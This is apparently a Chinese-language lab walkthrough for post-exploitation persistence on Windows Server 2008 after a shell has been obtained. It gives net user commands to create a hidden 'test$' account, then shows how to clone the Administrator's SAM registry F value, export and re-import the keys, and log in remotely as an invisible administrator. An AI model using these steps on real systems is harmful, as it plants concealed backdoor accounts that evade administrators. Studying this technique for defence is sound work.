实验前提:获得Win2008的shell
要求:获得Win2008的桌面
1.创建新账户,并加入administrator组
net user test$ 123456@lwz /add //创建test$用户,密码为123465@lwz net localgroup administrators test$ /add //把test$用户加入本地administrator组
2.在2008上查看用户,新建成功
3.Win+r输入regedit,打开注册表,进入HKEY_LOCAL_MACHINE\\SAM\\SAM
HKEY_LOCAL_MACHINE\\SAM\\SAM
发现sam打不开,需要右键赋予administrator权限
4.将Domains/Account/Users下test$对应的000003E9中F文件的内容用Administrator对应的000001F4中的F文件替换,使其拥有administrator权限
5.将test$和对应的文件导出到桌面上
6.在msfconsole删除test$用户
net user test$ /del
7.将导出的文件导入(双击,msfconsole命令行都可以)
8.影子账户创建成功,在Win2008看不到该账户,但该账户存在,且有administrator权限
9.远程登录该账户成功